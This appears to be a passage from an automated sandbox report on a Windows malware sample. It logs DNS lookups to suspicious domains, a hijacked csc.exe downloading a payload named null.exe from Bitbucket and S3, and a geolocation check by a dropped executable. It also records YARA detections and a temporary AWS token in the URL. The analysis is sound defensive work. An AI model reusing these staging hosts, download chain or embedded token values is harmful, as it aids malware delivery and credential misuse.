                                                                                                                                                    Dec 12, 2024 18:02:08.522505045 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.522553921 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.530426979 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.530447960 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.530538082 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.530550957 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.530600071 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.537616968 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.537636042 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.537708044 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.537718058 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.537760019 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.545578003 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.545598984 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.545650959 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.545660973 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.545746088 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.553541899 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.553561926 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.553647995 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.553663015 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.553708076 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.560720921 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.560738087 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.560812950 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.560823917 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.560862064 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.569124937 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.569140911 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.569205999 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.569216013 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.569246054 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.569266081 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.576519012 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.576546907 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.576616049 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.576622963 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.576664925 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.714457989 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.714488029 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.714559078 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.714570045 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.714595079 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.714607954 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.723758936 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.723776102 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.723834038 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.723841906 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.723886013 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.729752064 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.729768038 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.729814053 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.729820967 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.729873896 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.729873896 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.737828970 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.737848043 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.737901926 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.737915039 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.737941027 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.737953901 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.746987104 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.747005939 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.747103930 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.747113943 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.747215986 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.752882957 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.752902031 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.752966881 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.752978086 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.753031015 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.761293888 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.761312008 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.761372089 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.761382103 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.761425972 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.768412113 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.768429041 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.768481970 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.768488884 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.768526077 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.908587933 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.908621073 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.908660889 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.908687115 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.908720970 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.908767939 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.915601969 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.915621042 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.915692091 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.915704012 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.915747881 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.923732996 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.923755884 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.923820972 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.923834085 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.923887968 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.931143045 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.931200981 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.931230068 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.931240082 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.931272030 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.931288958 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.938853025 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.938901901 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.938935995 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.938944101 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.938977003 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.938993931 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.946924925 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.947030067 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.947216988 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.947216988 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.947299004 CET443497603.5.24.44192.168.2.5
                                                                                                                                                    Dec 12, 2024 18:02:08.947362900 CET49760443192.168.2.53.5.24.44
                                                                                                                                                    Dec 12, 2024 18:02:08.949764967 CET443497603.5.24.44192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 12, 2024 18:01:54.178286076 CET | 63563 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 18:01:54.318901062 CET | 53 | 63563 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 18:01:57.399106026 CET | 60311 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 18:01:57.537111998 CET | 53 | 60311 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 18:02:00.003859997 CET | 55482 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 18:02:00.343940973 CET | 53 | 55482 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 18:02:36.632292986 CET | 54195 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 18:02:36.771083117 CET | 53 | 54195 | 1.1.1.1 | 192.168.2.5
Dec 12, 2024 18:02:39.267191887 CET | 62371 | 53 | 192.168.2.5 | 1.1.1.1
Dec 12, 2024 18:02:39.406378031 CET | 53 | 62371 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 12, 2024 18:01:54.178286076 CET | 192.168.2.5 | 1.1.1.1 | 0xbed3 | Standard query (0) | navegacionseguracol24vip.org | A (IP address) | IN (0x0001) | false
Dec 12, 2024 18:01:57.399106026 CET | 192.168.2.5 | 1.1.1.1 | 0x552 | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Dec 12, 2024 18:02:00.003859997 CET | 192.168.2.5 | 1.1.1.1 | 0x213b | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Dec 12, 2024 18:02:36.632292986 CET | 192.168.2.5 | 1.1.1.1 | 0x926 | Standard query (0) | newstaticfreepoint24.ddns-ip.net | A (IP address) | IN (0x0001) | false
Dec 12, 2024 18:02:39.267191887 CET | 192.168.2.5 | 1.1.1.1 | 0x1a43 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 12, 2024 18:01:54.318901062 CET | 1.1.1.1 | 192.168.2.5 | 0xbed3 | No error (0) | navegacionseguracol24vip.org |  | 181.131.217.244 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 18:01:57.537111998 CET | 1.1.1.1 | 192.168.2.5 | 0x552 | No error (0) | bitbucket.org |  | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 18:01:57.537111998 CET | 1.1.1.1 | 192.168.2.5 | 0x552 | No error (0) | bitbucket.org |  | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 18:01:57.537111998 CET | 1.1.1.1 | 192.168.2.5 | 0x552 | No error (0) | bitbucket.org |  | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 18:02:00.343940973 CET | 1.1.1.1 | 192.168.2.5 | 0x213b | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 18:02:00.343940973 CET | 1.1.1.1 | 192.168.2.5 | 0x213b | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com |  | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 18:02:00.343940973 CET | 1.1.1.1 | 192.168.2.5 | 0x213b | No error (0) | s3-w.us-east-1.amazonaws.com |  | 3.5.24.44 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 18:02:00.343940973 CET | 1.1.1.1 | 192.168.2.5 | 0x213b | No error (0) | s3-w.us-east-1.amazonaws.com |  | 3.5.28.21 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 18:02:00.343940973 CET | 1.1.1.1 | 192.168.2.5 | 0x213b | No error (0) | s3-w.us-east-1.amazonaws.com |  | 52.216.42.153 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 18:02:00.343940973 CET | 1.1.1.1 | 192.168.2.5 | 0x213b | No error (0) | s3-w.us-east-1.amazonaws.com |  | 52.217.230.1 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 18:02:00.343940973 CET | 1.1.1.1 | 192.168.2.5 | 0x213b | No error (0) | s3-w.us-east-1.amazonaws.com |  | 52.217.133.241 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 18:02:00.343940973 CET | 1.1.1.1 | 192.168.2.5 | 0x213b | No error (0) | s3-w.us-east-1.amazonaws.com |  | 3.5.25.161 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 18:02:00.343940973 CET | 1.1.1.1 | 192.168.2.5 | 0x213b | No error (0) | s3-w.us-east-1.amazonaws.com |  | 52.217.192.137 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 18:02:00.343940973 CET | 1.1.1.1 | 192.168.2.5 | 0x213b | No error (0) | s3-w.us-east-1.amazonaws.com |  | 16.182.38.225 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 18:02:36.771083117 CET | 1.1.1.1 | 192.168.2.5 | 0x926 | No error (0) | newstaticfreepoint24.ddns-ip.net |  | 181.131.217.244 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 18:02:39.406378031 CET | 1.1.1.1 | 192.168.2.5 | 0x1a43 | No error (0) | geoplugin.net |  | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                                                                                                                    • bitbucket.org
                                                                                                                                                    • bbuseruploads.s3.amazonaws.com
                                                                                                                                                    • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49850 | 178.237.33.50 | 80 | 7120 | C:\Users\user\AppData\Local\Temp\ccrdlld.exe
Timestamp | Bytes transferred | Direction | Data
Dec 12, 2024 18:02:39.531410933 CET | 71 | OUT | GET /json.gp HTTP/1.1
                                                                                                                                                    Host: geoplugin.net
                                                                                                                                                    Cache-Control: no-cache
Dec 12, 2024 18:02:40.787400007 CET | 1171 | IN | HTTP/1.1 200 OK
                                                                                                                                                    date: Thu, 12 Dec 2024 17:02:40 GMT
                                                                                                                                                    server: Apache
                                                                                                                                                    content-length: 963
                                                                                                                                                    content-type: application/json; charset=utf-8
                                                                                                                                                    cache-control: public, max-age=300
                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                    Data Ascii: { "geoplugin_request":"8.46.123.189", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7503", "geoplugin_longitude":"-74.0014", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49750 | 185.166.143.49 | 443 | 1372 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-12 17:01:59 UTC | 101 | OUT | GET /facturacioncol/fact/downloads/null.exe HTTP/1.1
                                                                                                                                                    Host: bitbucket.org
                                                                                                                                                    Connection: Keep-Alive
2024-12-12 17:01:59 UTC | 5960 | IN | HTTP/1.1 302 Found
                                                                                                                                                    Date: Thu, 12 Dec 2024 17:01:59 GMT
                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Server: AtlassianEdge
                                                                                                                                                    Location: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGB46CDIP&Signature=OsUnoSTQrRgZD6FYZJqgppUhBLs%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIQC1qssmaZMu0Kq%2F5UE7VMx074oM1d%2BXj1uJ%2B9uNqpoePQIgFeE4zY04aoLCi5xHmh1Tg9HBeMUGDXUCT9cKr%2FT49vsqsAIIwv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDL4p3i3uRNNKPKBtsiqEAmWSN4qXnlEPekaIRewDbxqmzd738FbMSYF6yOejRX7UjKy58YjDJFsXH4LoiMqySTikefatHXwx8UawuXSw40xhPCSf6ZNVVhxIs6%2B98cEmwIvmpRC%2FOdW4sDY4BxSBIF%2F2NDDOh7bpfb7NAWS%2B9VcOTbH6Q5Odca1yZcK4sIsx90QntabTAavZ5qDYhdxdDEHOXtZ1I67Kh3cnKHUnUsfzGqjAWfoXFAT%2B6VxUzAueumFQfzwfbjwOus4ML23IBZ%2F8pc8JVhhIpJZjV04Xv2X%2BZ%2BDSSf4IIoyBBrjX%2Fp23vP%2B%2FAEHvBknm1v51J7irQC8H%2FqOcUfKjIseMSrem7rdR3R7tML2q7LoGOp0Be%2BbdUZ1VS1k%2BpYMTJXZ%2F0oOTjr23Th9wKEZGAxpdrR2zB1mn2dI1EsUc4DFBYgtG7bhYUMbmqOm68u4XRTBt5CkqTMOhF2vlWfjFIst [TRUNCATED]
                                                                                                                                                    Expires: Thu, 12 Dec 2024 17:01:59 GMT
                                                                                                                                                    Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                                                    X-Used-Mesh: False
                                                                                                                                                    Vary: Accept-Language, Origin
                                                                                                                                                    Content-Language: en
                                                                                                                                                    X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                                                    X-Dc-Location: Micros-3
                                                                                                                                                    X-Served-By: 6a30398dd4d5
                                                                                                                                                    X-Version: b7875da02c7c
                                                                                                                                                    X-Static-Version: b7875da02c7c
                                                                                                                                                    X-Request-Count: 1320
                                                                                                                                                    X-Render-Time: 0.0440976619720459
                                                                                                                                                    X-B3-Traceid: 5645ff12a3f84613938a48c5e72bca00
                                                                                                                                                    X-B3-Spanid: 2f952d108af986c0
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; base-uri 'self'; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--cate [TRUNCATED]
                                                                                                                                                    X-Usage-Quota-Remaining: 999133.595
                                                                                                                                                    X-Usage-Request-Cost: 879.33
                                                                                                                                                    X-Usage-User-Time: 0.016840
                                                                                                                                                    X-Usage-System-Time: 0.009540
                                                                                                                                                    X-Usage-Input-Ops: 0
                                                                                                                                                    X-Usage-Output-Ops: 0
                                                                                                                                                    Age: 0
                                                                                                                                                    X-Cache: MISS
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Xss-Protection: 1; mode=block
                                                                                                                                                    Atl-Traceid: 5645ff12a3f84613938a48c5e72bca00
                                                                                                                                                    Atl-Request-Id: 5645ff12-a3f8-4613-938a-48c5e72bca00
                                                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                                                    Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                                                    Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                                                    Server-Timing: atl-edge;dur=154,atl-edge-internal;dur=3,atl-edge-upstream;dur=152,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49760 | 3.5.24.44 | 443 | 1372 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-12 17:02:01 UTC | 1199 | OUT | GET /986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNGB46CDIP&Signature=OsUnoSTQrRgZD6FYZJqgppUhBLs%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJHMEUCIQC1qssmaZMu0Kq%2F5UE7VMx074oM1d%2BXj1uJ%2B9uNqpoePQIgFeE4zY04aoLCi5xHmh1Tg9HBeMUGDXUCT9cKr%2FT49vsqsAIIwv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDL4p3i3uRNNKPKBtsiqEAmWSN4qXnlEPekaIRewDbxqmzd738FbMSYF6yOejRX7UjKy58YjDJFsXH4LoiMqySTikefatHXwx8UawuXSw40xhPCSf6ZNVVhxIs6%2B98cEmwIvmpRC%2FOdW4sDY4BxSBIF%2F2NDDOh7bpfb7NAWS%2B9VcOTbH6Q5Odca1yZcK4sIsx90QntabTAavZ5qDYhdxdDEHOXtZ1I67Kh3cnKHUnUsfzGqjAWfoXFAT%2B6VxUzAueumFQfzwfbjwOus4ML23IBZ%2F8pc8JVhhIpJZjV04Xv2X%2BZ%2BDSSf4IIoyBBrjX%2Fp23vP%2B%2FAEHvBknm1v51J7irQC8H%2FqOcUfKjIseMSrem7rdR3R7tML2q7LoGOp0Be%2BbdUZ1VS1k%2BpYMTJXZ%2F0oOTjr23Th9wKEZGAxpdrR2zB1mn2dI1EsUc4DFBYgtG7bhYUMbmqOm68u4XRTBt5CkqTMOhF2vlWfjFIst%2FFcuh79oP5sOZM%2Bc28pWjSzS5Sb%2FRPafPW2EkE [TRUNCATED]
                                                                                                                                                    Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                    Connection: Keep-Alive
2024-12-12 17:02:02 UTC | 570 | IN | HTTP/1.1 200 OK
                                                                                                                                                    x-amz-id-2: GWbW+3Pq7gyGjHuWHk/96bSTZgazFrDdpr69Fgh3MzUK7a2JQUw2HkOHeKJ/S2ofFGefPASWe18WQV8VKFH362gw/yLQ3OBn4w+d/9/srXk=
                                                                                                                                                    x-amz-request-id: SGVRN7NY9KGM07CB
                                                                                                                                                    Date: Thu, 12 Dec 2024 17:02:03 GMT
                                                                                                                                                    Last-Modified: Thu, 12 Dec 2024 14:47:44 GMT
                                                                                                                                                    ETag: "27650afe28ba588c759ade95bf403833"
                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                    x-amz-version-id: kXXRZ1mUq75DO3FONi1exQQCVC7lCh3.
                                                                                                                                                    Content-Disposition: attachment; filename="null.exe"
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                                                    Content-Length: 4054528
                                                                                                                                                    Server: AmazonS3
                                                                                                                                                    Connection: close



                                                                                                                                                    Target ID:0
                                                                                                                                                    Start time:12:01:32
                                                                                                                                                    Start date:12/12/2024
                                                                                                                                                    Path:C:\Users\user\Desktop\4JwhvqLe8n.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Users\user\Desktop\4JwhvqLe8n.exe"
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    File size:2'652'160 bytes
                                                                                                                                                    MD5 hash:B58E300CA8077ADC4094E9044BCDBBC8
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Reputation:low
                                                                                                                                                    Has exited:true

                                                                                                                                                    Target ID:3
                                                                                                                                                    Start time:12:01:50
                                                                                                                                                    Start date:12/12/2024
                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                                                                                                                                    Imagebase:0x970000
                                                                                                                                                    File size:2'141'552 bytes
                                                                                                                                                    MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                    Yara matches:
                                                                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.4046933344.0000000007EC2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.4047509534.00000000094D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000003.00000002.4046933344.0000000007F9B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.4046058134.0000000006D21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                    Reputation:moderate
                                                                                                                                                    Has exited:false

